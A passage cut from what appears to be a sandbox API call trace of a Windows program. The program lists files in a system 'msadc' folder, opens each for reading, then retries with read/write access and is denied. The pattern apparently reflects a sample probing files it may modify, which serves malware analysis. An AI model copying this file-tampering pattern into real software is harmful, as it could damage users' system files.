(in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.532] CloseHandle (hObject=0x368) returned 1 [0088.532] AreFileApisANSI () returned 1 [0088.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0088.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82dd8 [0088.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x82dd8, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui") returned 65 [0088.532] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcer.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.532] GetLastError () returned 0x5 [0088.532] GetLastError () returned 0x5 [0088.532] SetLastError (dwErrCode=0x5) [0088.532] GetLastError () returned 0x5 [0088.532] SetLastError (dwErrCode=0x5) [0088.532] GetLastError () returned 0x5 [0088.532] SetLastError (dwErrCode=0x5) [0088.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82dd8 | out: hHeap=0x20000) returned 1 [0088.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0088.532] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.533] FindNextFileW (in: hFindFile=0x77f90, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b9e0d51, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb2c9ec00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x1800, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msadcor.dll.mui", cAlternateFileName="")) returned 1 [0088.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0088.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0088.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0088.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0088.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0088.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0088.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0088.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x604a8 [0088.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0088.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0088.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x604a8 | out: hHeap=0x20000) returned 1 [0088.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0088.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.533] AreFileApisANSI () returned 1 [0088.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui", lpUsedDefaultChar=0x0) returned 65 [0088.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0088.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.534] AreFileApisANSI () returned 1 [0088.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0088.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x824d8 [0088.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x824d8, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui") returned 65 [0088.534] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcor.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0088.535] GetFileType (hFile=0x368) returned 0x1 [0088.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x824d8 | out: hHeap=0x20000) returned 1 [0088.535] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.535] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.535] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.535] CloseHandle (hObject=0x368) returned 1 [0088.536] AreFileApisANSI () returned 1 [0088.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0088.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x829e8 [0088.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x829e8, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui") returned 65 [0088.536] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcor.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.536] GetLastError () returned 0x5 [0088.536] GetLastError () returned 0x5 [0088.536] SetLastError (dwErrCode=0x5) [0088.536] GetLastError () returned 0x5 [0088.536] SetLastError (dwErrCode=0x5) [0088.536] GetLastError () returned 0x5 [0088.536] SetLastError (dwErrCode=0x5) [0088.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x829e8 | out: hHeap=0x20000) returned 1 [0088.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0088.536] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.536] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.536] FindNextFileW (in: hFindFile=0x77f90, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ba9f918, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb198bf00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msaddsr.dll.mui", cAlternateFileName="")) returned 1 [0088.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0088.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0088.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0088.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0088.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0088.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0088.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0088.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0088.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0088.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0088.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0088.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0088.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0088.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a8c0 [0088.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0088.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0088.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.537] AreFileApisANSI () returned 1 [0088.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui", lpUsedDefaultChar=0x0) returned 65 [0088.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0088.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0088.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.537] AreFileApisANSI () returned 1 [0088.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0088.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82328 [0088.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x82328, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui") returned 65 [0088.538] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msaddsr.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0088.538] GetFileType (hFile=0x368) returned 0x1 [0088.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82328 | out: hHeap=0x20000) returned 1 [0088.538] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.538] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.538] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.538] CloseHandle (hObject=0x368) returned 1 [0088.539] AreFileApisANSI () returned 1 [0088.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0088.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82298 [0088.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x82298, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui") returned 65 [0088.539] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msaddsr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.539] GetLastError () returned 0x5 [0088.539] GetLastError () returned 0x5 [0088.539] SetLastError (dwErrCode=0x5) [0088.539] GetLastError () returned 0x5 [0088.539] SetLastError (dwErrCode=0x5) [0088.539] GetLastError () returned 0x5 [0088.539] SetLastError (dwErrCode=0x5) [0088.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82298 | out: hHeap=0x20000) returned 1 [0088.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0088.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.539] FindNextFileW (in: hFindFile=0x77f90, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ba9f918, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb198bf00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msdaprsr.dll.mui", cAlternateFileName="")) returned 1 [0088.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0088.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0088.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0088.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0088.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0088.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0088.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0088.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0088.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0088.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0088.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0088.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0088.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0088.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0088.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0088.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0088.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f848 [0088.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0088.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0088.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0088.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f848 | out: hHeap=0x20000) returned 1 [0088.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0088.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0088.540] AreFileApisANSI () returned 1 [0088.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui", lpUsedDefaultChar=0x0) returned 66 [0088.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0088.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0088.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.541] AreFileApisANSI () returned 1 [0088.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0088.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82dd8 [0088.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x82dd8, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui") returned 66 [0088.541] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaprsr.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0088.542] GetFileType (hFile=0x368) returned 0x1 [0088.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82dd8 | out: hHeap=0x20000) returned 1 [0088.542] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.542] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, 